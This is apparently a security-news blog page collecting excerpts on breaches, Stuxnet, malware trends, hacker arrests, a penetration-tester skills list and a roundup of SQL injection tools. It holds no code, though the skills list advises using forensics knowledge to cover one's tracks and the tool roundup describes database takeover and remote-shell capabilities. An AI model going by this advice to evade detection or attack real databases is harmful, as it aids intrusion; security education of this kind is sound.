Security is Inconvenient, Deal With It!

ZD Net had an article entitled "Kernel vulnerability places Samsung devices at risk" and I thought "so, what's new" until I followed the link to the forum post on xda-developers. Then I just lost it because I'm certain that this is a result of plain and simple laziness.

Here are my arguments for why I think it's laziness: First, This is Samsung we're talking about here. This error was should have been caught in code review or QA. Second, according to the first post the primary users of /dev/exynos-mem is

graphic usage like camera, graphic memory allocation, hdmi. By activating pid display in kmsg, surfaceflinger do mmap on the device (via one of the three shared libraries above ?? I have not see reference in binary to these libraires).

Read more...

Ideal Skill Set For the Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.


1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?


2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know that structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by W. Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing, be able to in detail describe how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?


3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP Spoof or a MiTM attack actually works. In short how can you violate or manipulate a process, if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see it work, the first thing that comes to my mind is “how does it work”.


4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).


5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on ebay, or maybe ask your company for old ones. Start with simple ACL’s on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s not better way to understand these concepts than to apply them. Once you’re mastered this, you can move to a PIX, or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.


6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.


7. Eventually learn a programming language, then learn a few more. Don’t go and by a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!


8. Have a desire and drive to learn new stuff. This is a must; It’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for), to really get a handle on things and stay up to date.


9. Learn a little about databases, and how they work. Go download mysql, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs help.


10. Always be willing to interact and share your knowledge with like minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery, janitorial, one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.


These things should get you started. Let me know if you have questions or comments.


Keatron.

Hackers at the Controls

An FBI report seen here details what could be seen as the hacking elite sect of Anonymous, Antisec, using a backdoor to compromise an air-conditioning control system in New Jersey.

This leaves me to the question of how vulnerable the government and private sectors are for these types of compromise of SCADA and building control systems.

Most hack jobs are attempts at ‘low hanging fruit’ or extraction of data. If the players are looking to ‘step it up’, then the heart of the data centers must be considered.

They are all, large and small, requiring the same components:

- Power

- HVAC (heat exchange)

- Flame Retardant Systems

- Secondary Power (UPS and generators)

- Physical Controls

- Space and Equipment

This may fall under facilities or IT, or a mixture of both, but a lot is vendor supported so that means controls go out the window.

Default or low strength passwords may be common!

Read more...

Cybercrime Will Eclipse Terrorism

Cybercriminals are becoming a threat that rivals terrorist groups like al Qaeda, according to the nation's top law enforcement official.

"Terrorism does remain the FBI's top priority, but in the not too-distant-future we anticipate that the cyberthreat will pose the greatest threat to our country," FBI Director Robert Mueller told a gathering of security professionals on Thursday at RSA's annual conference in San Francisco.

"Today, terrorists have not used the Internet to launch a full-scale cyberattack, but we cannot underestimate their intent," he said.

In the wake of the Sept. 11 attacks, the FBI invested heavily to develop new skill sets and formed more than 100 joint anti-terrorism task forces with other government agencies, military branches and local law enforcement organizations.

Read more...

Google.Com Now 'Censors' Explicit Content From Image Searches

Search giant Google has modified its "SafeSearch" feature, which has removed most pornographic, not-safe-for-work (NSFW) or explicit content from its image search results.

First reported on news-sharing site Reddit, hundreds of users have reacted angrily to the move. The new options only appear to affectGoogle.com for now, whereas other regional sites -- such asGoogle.co.uk -- have not yet changed. (My search history is not looking good right now.)

Google search users now have to be a little more specific before receiving goods of an explicit nature. For example, if one were to type in a particular sexual act, Google.com will no longer dish up what one was expecting. If users are more specific in what they are after, then it will return what one expected in the first place.

Read more...

Five Arrested In High-Profile Cyberattacks

NEW YORK (CNN) -- Top members of the computer hacker group"Anonymous" and its offshoots were arrested and charged Tuesday after a wide-ranging investigation used the help of a group leader who was working as a secret government informant.

Five of the suspects, considered by investigators among the "most sophisticated hackers in the world," were arrested in the United States and Europe and charged in a Manhattan federal court over their alleged role in high-profile cyberattacks against government agencies and large companies, according to an indictment.

A sixth man, Hector Xavier Monsegur, a notorious hacker known as "Sabu," pleaded guilty in August to computer hacking and other crimes.

Read more...

Google Hacking With GGGoogleScan

GGGoogleScan
GGGoogleScan is a Google scraper which performs automated searches and returns results of search queries in the form of URLs or hostnames. Datamining Google’s search index is useful for many applications. Despite this, Google makes it difficult for researchers to perform automatic search queries. The aim of is to make automated searches possible by avoiding the search activity that is detected as bot behaviour [1]. Basically we can enumerate hostnames and URLs with the GGGoogleScan tool, which can prove a valuable resource for later.

This tool has a number of ways to avoid being detected as a bot; one of them is horizontal searching, where we’re searching for multiple search words in parallel without requesting the contents of, for example, 1-50 results found by that search query. Rather than that, we’re making a large number of search queries, saving the results and only requesting a small number of web pages that were found as a result of scanning.

Read more...

Hexed – Working Effectively In The Hex Editor

I love my hex editor! I mean I really do. As reverse engineers and binary explorers, the hex editor is arguably the most used tool for human binary reconnaissance. From format exploration to file rebuilding, it’s the best utility in our toolkit with a great legacy of its own. From the diverse range of editors to the ken of features provided, it might seem a little daunting to first timers and redundant to advanced types. It’s my goal in this article to highlight the various features of this mighty tool that might just make your day. Let’s get to it.
What should you expect from your editor?

Locating your bytes:

The main display is always a hex byte representation of the binary file arranged in a tabular fashion.

Read more...

Google's Android Malware Detection Falls Short

Android appears to be on a trajectory to become the Windows of mobile operating systems, but there's a downside to ubiquity. Rising market share means increasing attention from malware authors.

Sophos, a computer security company, asserts that there is a growing malware problem for Android devices and that Android devices are less safe than iOS or Windows Phone devices. The FBI has noticed too, issuing a warning in October about risks facing Android users.

Read more...

Hactivist Group Team Ghostshell Takes Credit For Extensive Breach

The hacktivist group Team Ghostshell took credit Monday for the release of 1.6 million accounts and records stolen from government and private organizations covering aerospace, law enforcement, the military, the defense industry and banking.

Among the organizations the group claimed to have stolen information included NASA's Center For Advanced Engineering, the Department of Homeland Security (DHS) Information Network, the FBI's Washington division in Seattle, the Federal Reserve and Interpol.

Read more...

China Mafia-Style Hack Attack Drives California Firm to Brink

During his civil lawsuit against the People’s Republic of China, Brian Milburn says he never once saw one of the country’s lawyers. He read no court documents from China’s attorneys because they filed none. The voluminous case record at the U.S. District courthouse in Santa Ana contains a single communication from China: a curt letter to the U.S. State Department, urging that the suit be dismissed. 

That doesn’t mean Milburn’s adversary had no contact with him.

Read more...

E-Reader Privacy Chart, 2012 Edition

Who's Reading What Your Reading?

E-readers are great toys but if you concerned with who is tracking you don not get one.

Read more...

Scanning Web Servers With Nikto

Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify potential vulnerabilities. Nikto can be used in web application penetration tests and in some cases can produce juicy results.Specifically if a system administrator has not configured very well his web server and the web server is out of date or there is a misconfiguration Nikto is capable to find them.

For the needs of the article we will use Nikto in order to scan the web server where the DVWA (Damn Vulnerable Web Application) is hosted.Before we start the scan it is always a good practice to perform an update for obtaining the latest plugins.This can be achieved with the -update parameter.

Read more...

Romanian Authorities Dismantle Cybercrime Ring Responsible For $25M Credit Card Fraud

By Lucian Constantin
November 27, 2012 02:24 PM ET

IDG News Service - Romanian law enforcement authorities have dismantled a criminal group that stole credit card data from foreign companies as part of an operation that resulted in fraudulent transactions totaling $25 million.

Officers from the country's organized crime police working with prosecutors from the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) executed 36 search warrants on Tuesday at residential addresses in several Romanian cities and arrested 16 individuals suspected of being members of the credit card fraud ring.

According to DIICOT, the group's members gained unauthorized access to computer systems belonging to foreign companies that operate gas stations and grocery stores, and installed computer applications designed to intercept credit card transaction data.

Read more...

Hackers Hit International Atomic Energy Agency Server

IDG News Service - A group of hackers leaked email contact information of experts working with the International Atomic Energy Agency (IAEA) after breaking into one of the agency's servers.

The group published a list of 167 email addresses along with its manifesto on Sunday in a post on Pastebin.

"Some contact details related to experts working with the IAEA were posted on a hacker site on 25 November 2012," IAEA spokeswoman Gill Tudor said Wednesday in an emailed statement. "The IAEA deeply regrets this publication of information stolen from an old server that was shut down some time ago. In fact, measures had already been taken to address concern over possible vulnerability in this server."

Read more...

Google Says The Scope Of Drive-by Malware Is 'Significant'

How ironic that Google allows you to initiate a Web search by clicking on a button labeled "I'm Feeling Lucky." The button is supposed to take you to the first Web site that turns up in your search. Instead, it just might take you to malware hell.

In a preliminary report issued by Google in early February (see All Your iFrames Point to Us in the Google blog), researchers reveal the depth of the worldwide malware problem and conclude “the scope of the problem is significant.” This isn’t news if you’ve ever have to clean up the mess left behind after a malware infection. But if you’re feeling fairly confident that you do enough to protect yourself and the other users on your network, this report should open your eyes to the real world, and it’s not pretty.

New Weapon Against Drive-by Downloads Emerges

As more employees visit social networking sites while at work, network managers are seeing a rise in accidental malware infections known as drive-by download attacks.

Cybersecurity researchers trying to stop users from inadvertently compromising their machines have come up with a novel idea: Give them PCs running virtual machine software so they can act as sensors that detect malware infections and prevent them from infecting enterprise networks.

The idea was developed by George Mason University's Center for Secure Information Systems (CSIS) in conjunction with Northrup Grumman Information Systems.

This PCs-as-sensors approach was outlined at the Cyber Infrastructure Protection Conference held at the City College of New York last Friday.

Reference:

ATM Malware Spreading Around The World

Cash machines around the world are hosting malware that can harvest a person's card details for use in fraud, a situation that could worsen as the malware becomes more sophisticated, according to a security researcher.

Analysts at Trustwave's SpiderLabs research group were surprised earlier this year when it obtained the ATM malware sample from a financial institution in Eastern Europe, said Andrew Henwood, vice president of SpiderLabs's Europe, Middle East and Africa operation. Trustwave does forensic investigations for major credit card companies and financial institutions as well as penetration tests.

"It's the first time we have come across malware of this type," Henwood said.

Reference:

Cyber Criminals Target Travelers

FBI: Guests' Data Collected When They Log Into Hotel Wi-Fi Overseas
(CNN) -- A recent warning from the FBI about hackers targeting guests' data when they log into hotel Wi-Fi overseas was a salient reminder to travelers of the risks to data security on the road.

The alert, from the FBI's Internet Crime Complaint Center, was addressed to U.S. executives, government workers and academics but did not specify a particular country of threat. It warned of a spate of incidents of travelers encountering bogus software update pop-ups when they used hotel internet connections overseas. When they clicked on the "update," malicious software was installed on their computer.

Hotel Wi-Fi connections are particularly risky, said Sian John, UK security strategist at Symantec, because they are often set up without proper security settings. But they are merely one data-security threat among many facing business travelers.

Reference:

Anonymous Attack Brings Down Tons Of GoDaddy Sites

Today is not a good for those working behind the scenes at GoDaddy. TechCruch is reporting that an Anonymous member has brought GoDaddy down and, by extension, has brought down many of the sites GoDaddy hosts. Apparently, the attack was carried out by someone going by the name of “AnonymousOwn3r” on Twitter, and he says that he worked alone in bringing the website hosting service down.

FBI Director: Cybercrime Will Eclipse Terrorism

"Today, terrorists have not used the Internet to launch a full-scale cyberattack, but we cannot underestimate their intent," he said. In the wake of the Sept. 11 attacks, the FBI invested heavily to develop new skill sets and formed more than 100 joint anti-terrorism task forces with other government agencies, military branches and local law enforcement organizations.

Reference: Cybercrime Will Eclipse Terrorism

300,000 Infected Computers to Go Offline Monday

According to a group of security experts formed to combat DNSChanger, between a quarter-million and 300,000 computers, perhaps many more, were still infected as of July 2. 


DNSChanger hijacked users' clicks by modifying their computers' domain name system (DNS) settings to send URL requests to the criminals' own servers, a tactic that shunted victims to hacker-created sites that resembled real domains. 


At one point, as many as 4 million PCs and Macs were infected with the malware, which earned its makers $14 million, U.S. federal authorities have said. Infected machines will lose their link to the Internet at 12:01 a.m. ET Monday, July 9, when replacement DNS servers go dark.


Reference:

Ads on Wikipedia Can Point to Malware Infection

Every now and then, Wikipedia's popularity and brand are misused by malware peddlers, typosquatters and scammers.

But the fact that the Wikipedia project is funded exclusively by donors and the site never display ads also makes it a good litmus test for discovering whether one's machine is infected with certain types of malware.

"If you’re seeing advertisements for a for-profit industry or anything but our fundraiser, then your web browser has likely been infected with malware," Wikipedia's Director of Community Advocacy Philippe Beaudette pointed out in a recent blog post.

This usually happens when a specific browser extension has been inadvertently downloaded and installed by the user.

"Ads injected in this manner may be confined to some sites, even just to Wikipedia, or they may show up on all sites you visit," he says. "Browsing through a secure (HTTPS) connection may cause the ads to disappear, but will not fix the underlying problem."

One must disable the extension in question, but even after having done this, other malware could still be hiding on the computer, and then a malware scan is order.

Beaudette points out that ads seen on Wikipedia's site can have one final source - one that might not be malicious but is still annoying: the users' Internet provider, who injects them into web pages for profit.

Flashback Botmasters Earned Less Than $15K

The researchers initially calculated that a botnet of that size could bring in $10,000 per day to its masters, as the malware's ad-clicking component would intercept browser requests, target search queries made on Google and redirect users to another page of the attacker's choosing. Consequently, the attackers would receive payment for the ad click instead of Google.

Alas for the botmasters, not everything went as planned. They managed to install the ad-clicking component only on some 10,000 of the 600,000+ infected machines because security researchers reacted quickly and took down most of their C&C servers.

 "From our analysis we have seen that, for a three-week period starting in April, the botnet displayed over 10 million ads on compromised computers but only a small percentage of users who were shown ads actually clicked them, with close to 400,000 ads being clicked. These numbers earned the attackers $14,000 in these three weeks, although it is worth mentioning that earning the money is only one part of the puzzle—actually collecting that money is another, often more difficult, job," shared Symantec.


Reference:

Worm Targets Facebook Users Via PMs

A worm posing as a JPG image has seemingly been spotted propagating on Facebook and through various IM applications. "We recently received reports about private messages found on Facebook and distributing a link, which is a shortened URL pointing to an archive file May09-Picture18.JPG_www.facebook.com.zip,"  Trend Micro researchers warn. "This archive contains a malicious file named May09-Picture18.JPG_www.facebook.com and uses the extension .COM."

 Once the file is run and the worm gains a foothold in the system, it first tries to find and disable antivirus software in order to avoid detection. Then, it contacts a number of websites, and downloads from them another worm.

Zeus Exploits Users of Facebook, Gmail, Hotmail and Yahoo!

Trusteer discovered a series of attacks being carried out by a P2P variant of the Zeus platform against users of Facebook, Google Mail, Hotmail and Yahoo – offering rebates and new security measures.

The scams exploit the trust relationship between users and these well-known service providers, as well as the Visa and MasterCard brands, to steal users’ debit card data.

In the first attack against Facebook, the malware uses a web inject to present the victim with a fraudulent 20% cash back offer by linking their Visa or MasterCard debit card to their Facebook account.


Reference:

Cyber Security Still Takes A Backseat For Major Companies

As cyber threats continue to be a nuisance to major companies, senior management has yet to give it the attention it deserves, a recent study finds.

While they are some of the most distinguished enterprises in the world, and considered big targets for cyber attacks, the report indicates that top-level management at the firms still neglect suitable governance over the “security of their digital assets.”

Reference:

Wireless Tech Makes Health Care Security a 'Major Concern'

The use of wireless technology in the latest medical devices found in hospitals, health clinics and doctor offices has become a major concern of the U.S. Department of Homeland Security (DHS).

In a bulletin issued this month, the DHS warned that while new technology brings efficiency, lower cost and better patient care, it also carries security risks that the multi-trillion-dollar healthcare industry may not be prepared to tackle.

"The communications security of medical devices to protect against theft of medical information and malicious intrusion is now becoming a major concern," the report, entitled "Attack Surface: Healthcare and Public Health Sector," said.


Reference:

White House’s Cyber Security Official Retiring

The White House’s cybersecurity coordinator said Thursday that he is stepping down at the end of this month after a 2 1 / 2-year tenure in which the administration has increased its focus on cyber issues but struggled to reach agreement with lawmakers on the best way to protect the nation’s key computer networks from attack.

Howard Schmidt, who oversaw the creation of the White House’s first legislative proposal on Cyber Security, said he is retiring to spend more time with his family and to pursue teaching in the cyber field.

Reference:

Pre-Boxed Crap

The computer security problems in our country can be easily repaired and monitored. The problem is there are no industry standards for the software we are putting out there, no one is being held accountable, even the automotive industry is finally being held to several safety standards to protect the customers who purchased their vehicles. The way I look at it is we are again, "closing the barn door, after the horse ran away". It costs companies, corporations and individuals mega bucks to fix the software problems after a security incident has happened. Now what would be wrong with security testing the product before it leaves the building??? hmmmm...

...BUTCH

There’s a gap today in requirements. We can quite easily build security into in-house and off-shore developed applications by integrating commonly known requirements. 

For example:

1. We can require that developers not maintain integral state data on the client to defend against parameter manipulation. 
2. We can require that session ids are always sent over SSL. 
3. We can both require and check for these things before an app is deployed, so that the only thing left for crash testing are mistakes that slipped through the cracks, complex domain specific security flaws, and novel / unique security issues that haven’t been defined yet.

We as an industry have spoken at great lengths about security in the SDLC but we’ve only paid marginal attention to secure requirements. It’s time to move on from crash testing.

Ninety Percent of HTTPS Websites Insecure

Recently the most popular websites using secure online transactions (Online stores, banks, communication sites, etc.) were tested for security and most did not fare very well.

Of the approximately 200,000 HTTPS SSL encrypted websites tested, only about 10% are properly secured according to the Trustworthy Internet Movement (TIM).

Also, about 75% of the sites are still vulnerable to a BEAST attack:

Why Security Through Obscurity Still Does Not Work

Utah Department of Health officials say the breach, which they suspect involved East European hackers, exposed information about an estimated 780,000 adults and children. That information included 280,000 Social Security numbers.

Recently I provided Howard Anderson at HealthInfosecurity.com with some of my thoughts about the recent Utah Department of Health breach of the files of 900,000 individuals, and counting.

He included some of my thoughts in his blog post, along with thoughts from others. I wanted to provide my full reply here, along with some expanded thoughts.

As background, for those of you who may not have heard of this hack yet, in a nutshell:
The data breach occurred on March 30. A configuration error occurred at the password authentication level. This allowed hacker(s), located in Eastern Europe, to obtain files containing sensitive information by circumventing the Utah Department of Technology Services’ (DTS’s) security system. 

The files were stored on a server that contained Medicaid information at DTS.

Reference:

Future Security Basics

This incident points out the need for organizations, of all sizes and in all industries, to do the following to help prevent the same type of breach as that within the Utah DTS:

1. Have well documented systems and applications procedures and supporting standards in place that are consistently followed
2. Provide training and ongoing awareness for the procedures and standards
3. Log changes consistently, and have teams responsible for reviewing the logs, and maintaining the logs for an appropriate period of time
4. Perform ongoing audits to catch such configuration errors
5. Have a change control process in place to help keep the mistakes of individuals from being put into production
6. Use intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) to identify inappropriate access as soon as possible
7. Create and maintain well documented breach detection and response plans
8. Establish breach response teams and provide them with periodic training and ongoing awareness communications
9. Engage independent third parties to perform periodic vulnerability scans and penetration tests
10. Encrypt sensitive data, in transit and as rest in all storage locations. As this incident demonstrates, even if a sensitive file is located on a network behind a firewall, the bad guys may possibly still be able to get to it.

Reference:

Chinese Hackers Took Control of NASA Satellite for 11 Minutes

Hacking is becoming a growing problem on Earth. It may seem strange to mention Earth, as there’s not much to hack outside of our planet’s atmosphere unless you count satellites. Even then, how feasible would it be to gain access to the systems running such devices?

Well, China not only has people working on such things, it has been discovered they actually managed to take control of two NASA satellites for more than 11 minutes.

Reference:

2012 dubbed 'Year of the Smartphone Hacker'

Smartphone users are at risk of banking Trojans, spyware and infected apps and don't even realize it, say security experts who predict 2012 will be the "Year of the Smartphone Hacker."

Reference:

Security Professionals Aren’t Immune from Dumbass Moves

Spammers and fraudsters often wiggle into our lives through “social engineering,” pretending to be someone that we think we know.

What are some of the security tricks you’ve fallen for? Fess up in the comments below.
It’s one of the oldest tricks in the book and yet it’s so effective. Guess that’s why it keeps resurfacing. We’ve all seen the bad guys dish out a range of schemes over the years, from using nefarious links embedded in an email to, more recently, social media phishing attacks using these same lethal links in Facebook messages and Tweets.

Reference:

Hackers Steal $90,000 in Bitcoins

Bitcoin exchange site Bitcoinica suspended its operations on Friday after hackers managed to steal 18,547 bitcoins -- valued at about US $90,000 from its online wallet.

The user database probably was compromised as well, Bitcoinica's administrators said in an announcement posted on the site's home page. The information stored in the database included usernames, email addresses and account histories Account passwords were encrypted in a way that makes it extremely unlikely for them to be cracked, the Bitcoinica team said. However, to be on the safe side, the team advised users to change their passwords on other websites where they might have used them.

10 SQL Injection Tools

10 SQL Injection Tools For Database Pwnage


Black hat hackers and pen testers alike use these tools to dump data, perform privilege escalations, and effectively take over sensitive databases


BSQL Hacker 
Developed by Portcullis Labs, BSQL Hacker is an automated SQL injection framework that facilitates blind SQL injection, time-based blind SQL injection, deep blind SQL injection and error based SQL injection attacks. Attacks can be automated against Oracle and MySQL databases, with power to automatically extract all database data and schemas.


The Mole 
An open source tool, The Mole can bypass some IPS/IDS systems using generic filters. It is able to detect and exploit injections using only a vulnerable URL and a valid string on the site using union or Boolean query techniques. The command line tool offers support for attacks against MySQL, SQL Server, Postgres and Oracle databases.


Pangolin 
Produced by the same firm that wrote the JSky tool, NOSEC, Pangolin is a thorough SQL injection testing tool with a user-friendly GUI and a wide base of support for just about every database on the market. Primarily used by the white hat community as a comprehensive pen test tool, Pangolin offers its users the capability to create a comprehensive database management system fingerprint, to enumerate users, dump table and column information and run the users' own SQL statements.


Sqlmap 
A self-proclaimed automatic SQL injection and database takeover tool, the open source sqlmap tool sports the ability to attack via five different SQL injection techniques or directly if the user has DBMS credentials, IP address, port and database name. It can enumerate users and password hashes, with inline support to crack them with a dictionary-based attack and supports privilege escalation through Metasploit's getsystem command. It offers the ability to dump database tables and for MySQL, PostgreSQL or SQL server to download and upload any file and execute arbitrary code.


Havij 
A popular tool used by black hats worldwide, Havij was developed by Iranian coders who named it for the Farsi word for carrort, a moniker that doubles as slang for the male appendage. With a simple GUI, Havij brags about a success rate of 95 percent at injecting vulnerable targets on MySQL, Oracle, PostgreSQL, MS Access and Sybase databases. In addition to being able perform a back-end fingerprint, retrieve usernames and password hashes, dump tables and columns, fetch data and run SQL statements on vulnerable systems, it can also access the underlying file system and execute commands on the operating system.


Enema SQLi 
Unlike many automated tools designed for users with less than abundant technical knowledge, Enema isn't autohacking software, according to its developer, "mastermind." As mastermind says, "This is dynamic tool for people, who knows what to do." Grammatical issues notwithstanding, the tool gives users the ability to customize queries and use plugins to automate attacks against SQL Server and MySQL databases, using error-based, Union-based and blind time-based injection attacks.


Sqlninja 
Sqlninja's developer, icesurfer, puts it best explaining his creation, "Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!" Targeted against SQL Server environments, the tool offers database fingerprint, privilege escalation, and all the tools necessary to gain remote access of a database vulnerable to injection attacks.


sqlsus 
An open source MySQL injection and takeover tool, sqlsus runs with a command line interface and lets users inject their own SQL queries, download files from the attached Web server, crawl the website for writable directories, clone databases and upload and control backdoors.


Safe3 SQL Injector 
Widely known as one of the easiest to use SQL injection automation tools circulating the Internet, Safe3 SI offers a set of features that enable automatic detection and exploitation of SQL injection flaws and eventual database server takeover. The tool recognizes the database type and finds the best method of SQL injection, with support for blind, error-based UNION query and force guess injection techniques. It supports MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase and SAP MaxDB, with ability to read, list and write any file when the DBMS is MySQL or SQL Server and support for arbitrary command execution for SQL Server and Oracle DBMS.


SQL Poizon 
A SQL injection scanner/hunter tool, SQL Poizon takes advantage of search engine "dorks" to trawl the Internet for sites with SQL injection vulnerabilities. The tool has a built-in browser and injection builder to carry out and check the impact of an injection. It's simple GUI provides an easy interface to carry out an attack without a deep technical knowledge base.


Reference:

Stuxnet

Imagine a nefarious computer virus, one some industry experts say may be the most sophisticated piece of malware ever written. Imagine this worm, loaded onto a Siemens Programmable Logic Controller (PLC), creating two hexadecimal words as its output: DEAD F007. Now imagine this piece of malware, Stuxnet -- or something like it -- coming to an industrial plant near you. 

Let's start by dispelling one myth that seems to be growing up around this piece of PLC-controlling software: PLCs are not super-secret devices, but are standard bits of industrial control equipment that can cost as little as $200 (and, for really complicated ones, many thousands), and are available from industrial supply houses all over the world without any kind of security check. The software used to program PLCs is no more secret than the devices themselves. WinCC, the compromised program, may not be known to many programmers or sysadmins who work in offices, but it is a familiar tool for industrial plant people in many different fields. 

Siemens, based in Germany is one of the biggest of multinational big dogs in the PLC field. They sell into the U.S., China, Brazil, India, and almost anywhere else there's any industry at all. Want to count cereal boxes on an assembly line and measure out the right amount of cereal for each one? You can program a Siemens PLC for that application, no problem. Want to spin your Uranium-enrichment centrifuges at just the right speed? Ditto. Or run track-mounted speed detectors and switch gear for your high-speed rail system or the moisture control on your Yankee dryer? No problem. If there isn't a PLC app for that already, writing one is no big deal. 

An early article about the Stuxnet infection in Iran claimed that it infected "millions" of industrial control computers there. This is unlikely. Indeed, it's unlikely that Iran has millions of industrial control computers, period. And Stuxnet is not -- at least in forms discovered so far -- an Internet-spread problem, but one that typically infects a computer network when someone plugs a USB stick containing the worm into a computer on that network. 

Another article, on Forbes.com, postulated that the Stuxnet worm's purpose was to disable satellites run by the Indian Space Research Organization, which would mean more business and prestige for China's AsiaSat. 

And maybe some Siemens PLCs are not supposed to be going to Iran, after all. A New York Times story published on Sept. 29 said, "...last year officials in Dubai seized a large shipment of those controllers — known as the Simatic S-7 — after Western intelligence agencies warned that the shipment was bound for Iran and would likely be used in its nuclear program." 

That same story mentions the Biblical-sounding connection of one of the worm's file names to the Book of Esther, "a clear warning in a mounting technological and psychological battle as Israel and its allies try to breach Tehran’s most heavily guarded project." But it also says, "Others doubt the Israelis were involved and say the word could have been inserted as deliberate misinformation, to implicate Israel." 

And then there's that DEAD F007 "leetspeak" PLC output. Eric Loyd, President of Bitnetix, says that no matter how juvenile DEAD F007 sounds, "Stuxnet is far from a kid-hacker attack." Indeed, Loyd is one of many IT experts who believes Stuxnet may be the most sophisticated piece of malware ever written, with its use of four seperate Windows zero-day attacks, not one but two genuine security certificates (now revoked), and it's ability to not only monitor but modify instructions for the targeted Siemens PLCs. 

While PLCs may be a mystery to many -- even most -- programmers and syadmins, they are not complicated, nor do they take advanced degrees to figure out. In most of the industrial world, they are the responsibility of guys who wear their names on their shirts. Indeed, the whole point of SCADA is that it makes plant processes easy to visualize and control. 

So far there is no concrete evidence that Stuxnet-infected computers or PLCs have affected Iran's nuclear fuel enrichment program or delayed the startup of the country's one nuclear reactor. But there are suspicious coincidences that make it seems like Stuxnet might have donesomething to Iran's nuclear efforts, depending on which contradictory reports coming out of Iran you want to believe. 

On one hand Iranian government sources say Stuxnet has not caused problems or delays to anything nuclear, and on the other they claim they have arrested "Nuclear Cyberspace Spies" and is "fully aware of the activities of 'enemies' spy services.'" 


Stuxnet may not be the biggest problem

Whether Stuxnet is the work of Chinese or Israeli government cyberwarriors or a computer science student's prank that got out of hand, there are cures for it, and Microsoft is closing the four Windows zero-day vulnerabilities that allows the worm to do its mischief and to propagate laterally within a government or corporate computer network. And with the right malware protection, a Stuxnet infection can be detected immediately, says Kurt Bertone, Vice President of Strategic Alliances for Fidelity Security Systems, who says his company's XPS cyber defense products has no trouble dealing with Stuxnet. 

Other virus detection and malware control companies also now have a handle on Stuxnet, including Siemens, which offers complete Stuxnet detection and removal instructions. 

But the problem now, Bertone warns, is not so much Stuxnet but other pieces of malware that are out there but may not have been discovered. He and Eric Loyd both worry that there may be some "Son of Stuxnet" worm out there, spread manually, like Stuxnet, or by some other vector, that will one day cause dangereous problems at nuclear plants, oil refineries or chemical plants or.... 

...there are millions of critical points in our modern industrial infrastructure that use PLCs and other computer-based controls, some of which are carefully secured against malware infections -- and some of which are not secure at all but have not yet been attacked.

Hackers Nab Card Data From 200,000 Citi Customers

Citigroup Inc. has become the latest victim in a string of high-profile data thefts by hackers targeting some of the world's best-known companies.

The New York bank said Thursday that about 200,000 Citibank credit card customers in North America had their names, account numbers and email addresses stolen by hackers who broke into Citi's online account site.

The breach comes after data attacks in recent weeks have struck at companies including Internet search leader Google Inc., defense contractor Lockheed Martin Corp, and media and electronics company Sony Corp.

Citigroup said it discovered that account information for about 1 percent of its credit card customers had been viewed by hackers. Citi has more than 21 million credit card customers in North America, according to its 2010 annual report. The bank, which discovered the problem during routine monitoring, didn't say exactly how many accounts were breached. Citi said it was contacting those customers.

The bank said hackers weren't able to gain access to social security numbers, birth dates, card expiration dates or card security codes. That kind of information often leads to identity theft, where cyber criminals empty out bank accounts and apply for multiple credit cards. That can debilitate the finances and credit of victims. Citi customers could still be vulnerable other problems. Details about their bank accounts and financial information linked to them could be acquired using the email information and account numbers hackers stole.

Federal regulators have taken notice and are asking banks to improve security.

"Both banks and regulators must remain vigilant," said Sheila Bair, chair of the Federal Deposit Insurance Corporation. She said federal agencies, including the FDIC, are developing new rules to push banks to enhance online account access.

The Citi incident is only the latest data breach at a major company.

• On June 1, Google said that the personal Gmail accounts of several hundred people, including senior U.S. government officials, military personnel and political activists, had been breached.

• On May 30, broadcaster PBS confirmed that hackers cracked the network's website and posted a phony story claiming dead rapper Tupac Shakur was alive in New Zealand.

• On May 28, Lockheed Martin said it had detected a "significant and tenacious attack" against its computer networks. The company said it took swift and deliberate actions to protect the network and the systems remain secure.

